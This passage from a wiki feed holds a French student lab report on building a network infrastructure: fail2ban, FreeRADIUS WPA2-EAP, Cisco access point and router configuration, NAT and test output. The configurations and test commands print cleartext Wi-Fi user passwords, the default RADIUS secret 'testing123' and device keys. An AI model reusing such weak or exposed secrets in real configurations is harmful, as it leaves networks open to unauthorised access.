filter = named-refused&lt;br /&gt;
logpath = /var/log/named/security.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Filtre &amp;lt;code&amp;gt;/etc/fail2ban/filter.d/named-refused.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[Definition]&lt;br /&gt;
failregex = ^\S+ named\[\d+\]: client &amp;lt;HOST&amp;gt;#\S+ .* query .* denied&lt;br /&gt;
ignoreregex =&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le service est démarré et activé :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
systemctl enable fail2ban&lt;br /&gt;
systemctl restart fail2ban&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation WiFi par WPA2‑EAP ==&lt;br /&gt;
&lt;br /&gt;
=== Serveur FreeRADIUS sur Moon ===&lt;br /&gt;
Installation :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt install freeradius freeradius-utils -y&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ajout du client (point d’accès) dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client vlan1_ap1 {&lt;br /&gt;
    ipaddr = 172.27.0.4    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap1-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
client vlan1_ap2 {&lt;br /&gt;
    ipaddr = 172.27.0.3    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap2-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création d’un utilisateur dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;msalhi&amp;quot; Cleartext-Password := &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
&amp;quot;etudiant1&amp;quot; Cleartext-Password := &amp;quot;Password123&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;quot;prof&amp;quot; Cleartext-Password := &amp;quot;AdminSE4!&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration EAP pour PEAP‑MSCHAPv2 dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt; (type par défaut &amp;lt;code&amp;gt;peap&amp;lt;/code&amp;gt;, tunnel intérieur &amp;lt;code&amp;gt;mschapv2&amp;lt;/code&amp;gt;).  &lt;br /&gt;
Un conflit de port (18120) a été résolu en commentant la section &amp;lt;code&amp;gt;listen&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/sites-enabled/inner-tunnel&amp;lt;/code&amp;gt; (ou en mettant &amp;lt;code&amp;gt;port = 0&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
Test local :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
radtest msalhi WifiSecure2026! localhost 0 testing123&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76&lt;br /&gt;
	User-Name = &amp;quot;msalhi&amp;quot;&lt;br /&gt;
	User-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
	NAS-IP-Address = 127.0.0.1&lt;br /&gt;
	NAS-Port = 0&lt;br /&gt;
	Message-Authenticator = 0x00&lt;br /&gt;
	Cleartext-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
→ réponse &amp;lt;code&amp;gt;Access-Accept&amp;lt;/code&amp;gt; attendue.&lt;br /&gt;
&lt;br /&gt;
=== Configuration du point d’accès WiFi ===&lt;br /&gt;
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
aaa group server radius radius_student25&lt;br /&gt;
 server 192.168.20.2 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
aaa authentication login eap_student25 group radius_student25&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_15&lt;br /&gt;
 vlan 25&lt;br /&gt;
 authentication open eap eap_student25&lt;br /&gt;
 authentication network-eap eap_student25&lt;br /&gt;
 authentication key-management wpa version 2&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
 encryption vlan 25 mode ciphers aes-ccm&lt;br /&gt;
 ssid VM_SERVICES_15&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configuration DHCP sur les routeurs ===&lt;br /&gt;
Sur '''E304''' (plage 100‑150) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 10.60.15.1 10.60.15.99&lt;br /&gt;
ip dhcp excluded-address 10.60.15.151 10.60.15.254&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool SALHI_VLAN25&lt;br /&gt;
 network 10.60.15.0 255.255.255.0&lt;br /&gt;
 default-router 10.60.15.1&lt;br /&gt;
 dns-server 192.168.20.2 8.8.8.8&lt;br /&gt;
 domain-name msalhi.online&lt;br /&gt;
 lease 0 12&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Policy‑Based Routing (PBR) ===&lt;br /&gt;
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip access-list extended TRAFIC_VLAN25&lt;br /&gt;
 permit ip 10.60.15.0 0.0.0.255 any&lt;br /&gt;
!&lt;br /&gt;
route-map PBR_VLAN25 permit 10&lt;br /&gt;
 match ip address TRAFIC_VLAN25&lt;br /&gt;
 set ip next-hop 193.48.57.167&lt;br /&gt;
!&lt;br /&gt;
interface Vlan25&lt;br /&gt;
 ip policy route-map PBR_VLAN25&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests ===&lt;br /&gt;
Un client connecté au SSID &amp;lt;code&amp;gt;VM_SERVICES_15&amp;lt;/code&amp;gt; obtient une adresse IP dans la plage DHCP (ex. &amp;lt;code&amp;gt;10.60.15.101&amp;lt;/code&amp;gt;), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (&amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
= Vérifications et tests =&lt;br /&gt;
&lt;br /&gt;
Cette section regroupe l’ensemble des commandes exécutées pour valider le bon fonctionnement de chaque composant de l’infrastructure. Les sorties sont présentées telles qu’obtenues sur les machines concernées.&lt;br /&gt;
&lt;br /&gt;
== Services Web ==&lt;br /&gt;
&lt;br /&gt;
=== Sur Moon (machine de services) ===&lt;br /&gt;
Vérification de l’écoute Apache sur les ports 80 et 443 :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ss -tlnp | grep -E ':80|:443'&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
LISTEN 0      128                                          *:80              *:*    users:((&amp;quot;apache2&amp;quot;,pid=16838,fd=4),(&amp;quot;apache2&amp;quot;,pid=16837,fd=4),(&amp;quot;apache2&amp;quot;,pid=7274,fd=4))&lt;br /&gt;
LISTEN 0      128                                          *:443             *:*    users:((&amp;quot;apache2&amp;quot;,pid=16838,fd=6),(&amp;quot;apache2&amp;quot;,pid=16837,fd=6),(&amp;quot;apache2&amp;quot;,pid=7274,fd=6))&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test d’accès HTTPS en local (IPv6) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
curl -6 https://msalhi.online -I&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Fri, 27 Feb 2026 11:04:38 GMT&lt;br /&gt;
Server: Apache/2.4.66 (Debian)&lt;br /&gt;
Strict-Transport-Security: max-age=63072000; includeSubDomains&lt;br /&gt;
X-Frame-Options: DENY&lt;br /&gt;
X-Content-Type-Options: nosniff&lt;br /&gt;
X-XSS-Protection: 1; mode=block&lt;br /&gt;
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT&lt;br /&gt;
ETag: &amp;quot;1515-64a2d916615c9&amp;quot;&lt;br /&gt;
Accept-Ranges: bytes&lt;br /&gt;
Content-Length: 5397&lt;br /&gt;
Vary: Accept-Encoding&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sur Solstice (machine mandataire) ===&lt;br /&gt;
Test d’accès HTTPS via le proxy inverse (IPv4) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
curl -4 https://msalhi.online -I&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Fri, 27 Feb 2026 11:04:55 GMT&lt;br /&gt;
Server: Apache/2.4.66 (Debian)&lt;br /&gt;
Strict-Transport-Security: max-age=63072000; includeSubDomains&lt;br /&gt;
X-Frame-Options: DENY&lt;br /&gt;
X-Content-Type-Options: nosniff&lt;br /&gt;
X-XSS-Protection: 1; mode=block&lt;br /&gt;
Last-Modified: Fri, 06 Feb 2026 20:23:53 GMT&lt;br /&gt;
ETag: &amp;quot;1515-64a2d916615c9&amp;quot;&lt;br /&gt;
Accept-Ranges: bytes&lt;br /&gt;
Content-Length: 5397&lt;br /&gt;
Vary: Accept-Encoding&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification des règles NAT :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -L POSTROUTING -n -v&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Chain POSTROUTING (policy ACCEPT 8219 packets, 528K bytes)&lt;br /&gt;
 pkts bytes target     prot opt in     out     source               destination         &lt;br /&gt;
18528 1577K MASQUERADE  0    --  *      eth1    0.0.0.0/0            0.0.0.0/0           &lt;br /&gt;
 3254  225K MASQUERADE  0    --  *      eth0    10.60.15.0/24        0.0.0.0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La première règle assure la mascarade pour tout le trafic sortant sur l’interface publique (eth1). La seconde règle (source 10.60.15.0/24 sortant sur eth0) est résiduelle mais ne perturbe pas le fonctionnement.&lt;br /&gt;
&lt;br /&gt;
== fail2ban ==&lt;br /&gt;
&lt;br /&gt;
=== Sur Solstice ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
fail2ban-client status sshd&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Status for the jail: sshd&lt;br /&gt;
|- Filter&lt;br /&gt;
|  |- Currently failed:	0&lt;br /&gt;
|  |- Total failed:	12792&lt;br /&gt;
|  `- File list:	/var/log/auth.log&lt;br /&gt;
`- Actions&lt;br /&gt;
   |- Currently banned:	4&lt;br /&gt;
   |- Total banned:	3114&lt;br /&gt;
   `- Banned IP list:	134.199.155.127 162.243.33.174 152.42.166.201 206.189.90.119&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sur Moon ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
fail2ban-client status sshd&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Status for the jail: sshd&lt;br /&gt;
|- Filter&lt;br /&gt;
|  |- Currently failed:	0&lt;br /&gt;
|  |- Total failed:	1&lt;br /&gt;
|  `- File list:	/var/log/auth.log&lt;br /&gt;
`- Actions&lt;br /&gt;
   |- Currently banned:	0&lt;br /&gt;
   |- Total banned:	0&lt;br /&gt;
   `- Banned IP list:	&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== WPA2‑EAP – FreeRADIUS (sur Moon) ==&lt;br /&gt;
Statut du service :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
systemctl status freeradius&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
● freeradius.service - FreeRADIUS multi-protocol policy server&lt;br /&gt;
   Loaded: loaded (/lib/systemd/system/freeradius.service; enabled)&lt;br /&gt;
   Active: active (running) since ...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test d’authentification local :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
radtest msalhi WifiSecure2026! localhost 1812 testing123&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76&lt;br /&gt;
	User-Name = &amp;quot;msalhi&amp;quot;&lt;br /&gt;
	User-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
	NAS-IP-Address = 127.0.0.1&lt;br /&gt;
	NAS-Port = 0&lt;br /&gt;
	Message-Authenticator = 0x00&lt;br /&gt;
	Cleartext-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du client RADIUS (point d’accès) extraite de &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client vlan1_ap1 {&lt;br /&gt;
    ipaddr = 172.27.0.4&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap1-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
client vlan1_ap2 {&lt;br /&gt;
    ipaddr = 172.27.0.3&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap2-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== WPA2‑EAP – Point d’accès (wifi‑E304) ==&lt;br /&gt;
Connexion SSH (commande adaptée) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification du SSID et de son VLAN :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show dot11 ssid VM_SERVICES_15&lt;br /&gt;
SSID Name                : VM_SERVICES_15&lt;br /&gt;
Status                   : Enabled&lt;br /&gt;
Broadcast SSID           : Enabled&lt;br /&gt;
VLAN                     : 25&lt;br /&gt;
Authentication Methods   : Open EAP, Network-EAP&lt;br /&gt;
WPA Key Management       : WPA2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification des serveurs RADIUS configurés :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show running-config | include radius-server&lt;br /&gt;
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key 7 044F0E151B284249584B56&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Statistiques RADIUS :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show aaa servers&lt;br /&gt;
RADIUS: id 7, priority 6, host 192.168.20.2, auth-port 1812, acct-port 1813&lt;br /&gt;
     State: current UP, duration 794495s&lt;br /&gt;
     Authen: request 2076, timeouts 1646&lt;br /&gt;
             Transaction: success 430, failure 411&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test d’authentification :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#test aaa group radius_student25 msalhi WifiSecure2026! legacy&lt;br /&gt;
Attempting authentication test to server-group radius_student25 using radius&lt;br /&gt;
User was successfully authenticated.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Clients associés :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show dot11 associations&lt;br /&gt;
802.11 Client Stations on Dot11Radio1: &lt;br /&gt;
SSID [VM_SERVICES_15] : &lt;br /&gt;
MAC Address    IP address      Device        Name            Parent         State     &lt;br /&gt;
a0b3.395a.dcc8 10.60.15.153    unknown       -               self           EAP-Assoc&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
État du VLAN 25 sur l’AP :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wifi-E304#show vlan 25&lt;br /&gt;
Virtual LAN ID:  25 (IEEE 802.1Q Encapsulation)&lt;br /&gt;
   vLAN Trunk Interfaces:  Dot11Radio0.25, Dot11Radio1.25, GigabitEthernet0.25&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== WPA2‑EAP – Routeur central (C9200‑E304) ==&lt;br /&gt;
Connexion SSH (commande adaptée) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vérification du VLAN 25 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show vlan brief | include 25&lt;br /&gt;
25   E15-MSalhi                       active&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Interface VLAN 25 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show ip interface brief | include Vlan25&lt;br /&gt;
Vlan25                 10.60.15.2      YES manual up                    up&lt;br /&gt;
C9200-E304#show ipv6 interface brief | include Vlan25&lt;br /&gt;
Vlan25                 [up/up]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
VRRP pour VLAN 25 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show vrrp brief | include 25&lt;br /&gt;
Vl25                25 IPv4 110     0  N   Y  MASTER  10.60.15.2(local) 10.60.15.1&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show vrrp Vlan25&lt;br /&gt;
Vlan25 - Group 25 - Address-Family IPv4&lt;br /&gt;
  State is MASTER&lt;br /&gt;
  Virtual IP address is 10.60.15.1&lt;br /&gt;
  Priority is 110&lt;br /&gt;
  Master Router is 10.60.15.2 (local)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
DHCP :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show ip dhcp pool&lt;br /&gt;
...&lt;br /&gt;
Pool PoolSalhi :&lt;br /&gt;
 Utilization mark (high/low)    : 100 / 0&lt;br /&gt;
 Total addresses                : 254&lt;br /&gt;
 Leased addresses               : 1&lt;br /&gt;
 Excluded addresses             : 150&lt;br /&gt;
 Current index        IP address range                    Leased/Excluded/Total&lt;br /&gt;
 10.60.15.156         10.60.15.1       - 10.60.15.254      1     / 150   / 254&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip dhcp binding | include 10.60.15&lt;br /&gt;
10.60.15.153    ff39.5adc.c800.0100.    Feb 27 2026 08:59 PM    Automatic  Active     Vlan25&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Policy‑Based Routing (PBR) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show route-map PBR_VLAN25&lt;br /&gt;
route-map PBR_VLAN25, permit, sequence 10&lt;br /&gt;
  Match clauses:&lt;br /&gt;
    ip address (access-lists): TRAFIC_VLAN25 &lt;br /&gt;
  Set clauses:&lt;br /&gt;
    ip next-hop 193.48.57.167&lt;br /&gt;
  Policy routing matches: 3128 packets, 1082288 bytes&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip access-lists TRAFIC_VLAN25&lt;br /&gt;
Extended IP access list TRAFIC_VLAN25&lt;br /&gt;
    10 permit ip 10.60.15.0 0.0.0.255 any (3128 matches)&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip policy&lt;br /&gt;
Interface      Route map&lt;br /&gt;
Vlan25         PBR_VLAN25&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Trunk vers le point d’accès :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show interfaces trunk&lt;br /&gt;
Port        Mode             Encapsulation  Status        Native vlan  &lt;br /&gt;
Gi1/0/1     on               802.1q         trunking      1&lt;br /&gt;
&lt;br /&gt;
Port        Vlans allowed and active in management domain&lt;br /&gt;
Gi1/0/1     1-2,11-12,15-16,19-20,23-25,28,530&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show interfaces GigabitEthernet1/0/1 switchport&lt;br /&gt;
Name: Gi1/0/1&lt;br /&gt;
Switchport: Enabled&lt;br /&gt;
Administrative Mode: trunk&lt;br /&gt;
Operational Mode: trunk&lt;br /&gt;
Trunking VLANs Enabled: ALL&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Réseau basique et avancé ==&lt;br /&gt;
&lt;br /&gt;
Routes sur E304 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show ip route | include 10.60.15&lt;br /&gt;
C        10.60.15.0/24 is directly connected, Vlan25&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip route 0.0.0.0&lt;br /&gt;
Gateway of last resort is 193.48.57.162 to network 0.0.0.0&lt;br /&gt;
O*E2  0.0.0.0/0 [110/1] via 193.48.57.162, Vlan2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connectivité depuis Moon vers la passerelle VLAN 25 :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ping -c 3 10.60.15.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
PING 10.60.15.1 (10.60.15.1) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.15.1: icmp_seq=1 ttl=253 time=1.35 ms&lt;br /&gt;
64 bytes from 10.60.15.1: icmp_seq=2 ttl=253 time=2.09 ms&lt;br /&gt;
64 bytes from 10.60.15.1: icmp_seq=3 ttl=253 time=1.17 ms&lt;br /&gt;
&lt;br /&gt;
--- 10.60.15.1 ping statistics ---&lt;br /&gt;
3 packets transmitted, 3 received, 0% packet loss, time 2003ms&lt;br /&gt;
rtt min/avg/max/mdev = 1.171/1.536/2.091/0.398 ms&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
= Conclusion =&lt;br /&gt;
L’infrastructure déployée répond à toutes les exigences du projet :&lt;br /&gt;
* Virtualisation Xen avec séparation des rôles (services / mandataire)&lt;br /&gt;
* Services sécurisés : SSH redirigé, DNS maître/esclave avec DNSSEC, HTTPS avec certificat Gandi, proxy inverse IPv4&lt;br /&gt;
* Filtrage des attaques par fail2ban&lt;br /&gt;
* Réseau redondant avec VRRP, DHCP, et Policy‑Based Routing&lt;br /&gt;
* WiFi sécurisé par WPA2‑EAP avec FreeRADIUS&lt;br /&gt;
* Tests d’intrusion concluants sur WEP et WPA2‑PSK&lt;br /&gt;
* Chiffrement de données avec LUKS&lt;br /&gt;
&lt;br /&gt;
L’ensemble est fonctionnel et démontre une maîtrise des technologies mises en œuvre.&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:Wpa-wps.png&amp;diff=12500</id>
		<title>Fichier:Wpa-wps.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:Wpa-wps.png&amp;diff=12500"/>
		<updated>2026-02-27T12:53:58Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;effracage&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12496</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12496"/>
		<updated>2026-02-27T12:51:17Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Rapport de Projet SE4 IdO'''                                                                                             '''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''                                                           '''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
